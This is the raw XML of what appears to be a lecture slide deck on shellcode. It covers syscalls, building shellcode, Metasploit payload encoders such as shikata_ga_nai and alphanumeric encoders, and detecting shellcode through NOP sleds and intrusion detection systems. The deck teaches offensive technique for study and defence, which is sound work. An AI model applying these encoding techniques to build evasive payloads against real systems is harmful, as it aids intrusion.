              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> XOR Encoder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>x86/call4_dword_xor              normal     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>Call+4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> XOR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context_cpuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>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/>
              <a:t>CPUID-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Keyed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> Payload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context_stat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t> 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 err="1"/>
              <a:t>stat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>(2)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Keyed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> Payload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context_time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t> 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/>
              <a:t>time(2)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Keyed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> Payload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countdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>                    normal     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>Single-byte XOR Countdown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fnstenv_mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>                  normal     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>Variable-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Fnstenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> XOR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jmp_call_additive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>            normal     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>Jump/Call XOR Additive Feedback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nonalpha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>Non-Alpha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nonupper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>Non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Upper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>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opt_sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>      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/>
              <a:t>Sub Encoder (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>optimised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>)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shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>excellent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Polymorphic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> XOR Additive Feedback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single_static_bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>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/>
              <a:t>Single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> Bit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unicode_mixed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>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/>
              <a:t>Alpha2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Alphanumeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> Unicode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Mixedcase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> Encoder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>unicode_upper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>manual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>Alpha2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Alphanumeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> Unicode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Uppercase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Encoder</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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2060848"/>
            <a:ext cx="48445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/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t>x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1"/>
              <a:t>add_sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t>                  </a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" smtClean="0"/>
              <a:t>x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>alpha_mixed</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" smtClean="0"/>
              <a:t>x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>alpha_upper</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" smtClean="0"/>
              <a:t>x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>avoid_underscore_tolower</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t>x86/avoid_utf8_tolower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26910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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Shellcode: Payload Encoder</a:t>
            </a:r>
            <a:endParaRPr lang="de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Alphanumeric Shellcode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78081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9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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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</a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can generate shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Pretty much any form of shellcode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7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References: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References:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Modern vulnerability exploiting: Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-CH" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>drive.google.com/file/d/0B7qRLuwvXbWXT1htVUVpdjRZUmc/edit</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="de-CH" smtClean="0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8413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Defense: Detect Shellcode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92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does a shellcode work?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Assembler instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Native code which performs a certain action (like starting a shell)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97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 Shellcode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detect shellcode usage:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Find NOP’s (lots of 0x90)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Find stager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Find stage1 / stage2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>NIDS: Network based Intrusion Detection System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>HIDS: Host based Intrusion Detection System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8758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Network based intrusion detection system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4215670"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr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3358</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>A4 Paper (210x297 mm)</PresentationFormat>
  <Paragraphs>748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CSCH_presentation_empty_english</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Content</vt:lpstr>
      <vt:lpstr>Shellcode?</vt:lpstr>
      <vt:lpstr>Shellcode! Example in one slide</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Syscalls</vt:lpstr>
      <vt:lpstr>Syscalls</vt:lpstr>
      <vt:lpstr>Syscalls</vt:lpstr>
      <vt:lpstr>Syscalls</vt:lpstr>
      <vt:lpstr>Syscalls</vt:lpstr>
      <vt:lpstr>Syscalls</vt:lpstr>
      <vt:lpstr>Syscalls</vt:lpstr>
      <vt:lpstr>Syscalls</vt:lpstr>
      <vt:lpstr>Syscalls</vt:lpstr>
      <vt:lpstr>Syscalls</vt:lpstr>
      <vt:lpstr>Syscalls</vt:lpstr>
      <vt:lpstr>Syscalls: Assembler print</vt:lpstr>
      <vt:lpstr>Syscalls: Assembler print</vt:lpstr>
      <vt:lpstr>Syscalls: Assembler print</vt:lpstr>
      <vt:lpstr>Syscalls</vt:lpstr>
      <vt:lpstr>How is shellcode formed?</vt:lpstr>
      <vt:lpstr>How is shellcode formed?</vt:lpstr>
      <vt:lpstr>How is shellcode formed?</vt:lpstr>
      <vt:lpstr>How is shellcode formed?</vt:lpstr>
      <vt:lpstr>How is shellcode formed?</vt:lpstr>
      <vt:lpstr>How is shellcode formed?</vt:lpstr>
      <vt:lpstr>How is shellcode formed?</vt:lpstr>
      <vt:lpstr>How is shellcode formed?</vt:lpstr>
      <vt:lpstr>How is shellcode formed?</vt:lpstr>
      <vt:lpstr>How is shellcode formed?</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Null Bytes</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Null Bytes</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Null Bytes</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Null Bytes</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Null Bytes</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Null Bytes</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Null Bytes</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Stack Reference</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Stack Reference</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Stack Reference</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Stack Reference</vt:lpstr>
      <vt:lpstr>Syscalls: Memory Layout</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Stack Reference</vt:lpstr>
      <vt:lpstr>Syscalls: Memory Layout</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Stack Reference</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Stack Reference</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Stack Reference</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Stack Reference</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Stack Reference</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Stack Reference</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Stack Reference</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Stack Reference</vt:lpstr>
      <vt:lpstr>Shellcode Fix: Stack Reference</vt:lpstr>
      <vt:lpstr>Fixed Shellcode</vt:lpstr>
      <vt:lpstr>Shellcode Problems</vt:lpstr>
      <vt:lpstr>Memory Layout (Old, with data reference)</vt:lpstr>
      <vt:lpstr>Memory Layout (New, stack reference)</vt:lpstr>
      <vt:lpstr>Convert shellcode</vt:lpstr>
      <vt:lpstr>Execute shellcode</vt:lpstr>
      <vt:lpstr>Memory Layout (New New)</vt:lpstr>
      <vt:lpstr>Execute Stuff</vt:lpstr>
      <vt:lpstr>Execute Stuff</vt:lpstr>
      <vt:lpstr>Shell Execute Shellcode</vt:lpstr>
      <vt:lpstr>Shellcode! Example in one slide</vt:lpstr>
      <vt:lpstr>32 vs 64 bit</vt:lpstr>
      <vt:lpstr>32bit vs 64bit</vt:lpstr>
      <vt:lpstr>32bit vs 64bit</vt:lpstr>
      <vt:lpstr>Types of shellcode</vt:lpstr>
      <vt:lpstr>Types of shellcode</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Types of shellcode</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Metasploit Shellcode: Payload List</vt:lpstr>
      <vt:lpstr>Metasploit Shellcode: Payload Create</vt:lpstr>
      <vt:lpstr>Metasploit Shellcode: Payload Create</vt:lpstr>
      <vt:lpstr>Metasploit Shellcode: Payload Encoder</vt:lpstr>
      <vt:lpstr>Metasploit Shellcode: Payload Encoder</vt:lpstr>
      <vt:lpstr>Metasploit Shellcode</vt:lpstr>
      <vt:lpstr>References:</vt:lpstr>
      <vt:lpstr>Defense: Detect Shellcode</vt:lpstr>
      <vt:lpstr>Detect Shellcode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85</cp:revision>
  <cp:lastPrinted>1999-09-08T18:00:21Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-03-14T12:32:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-01-24T14:09:34Z</dcterms:modified>
</cp:coreProperties>
</file>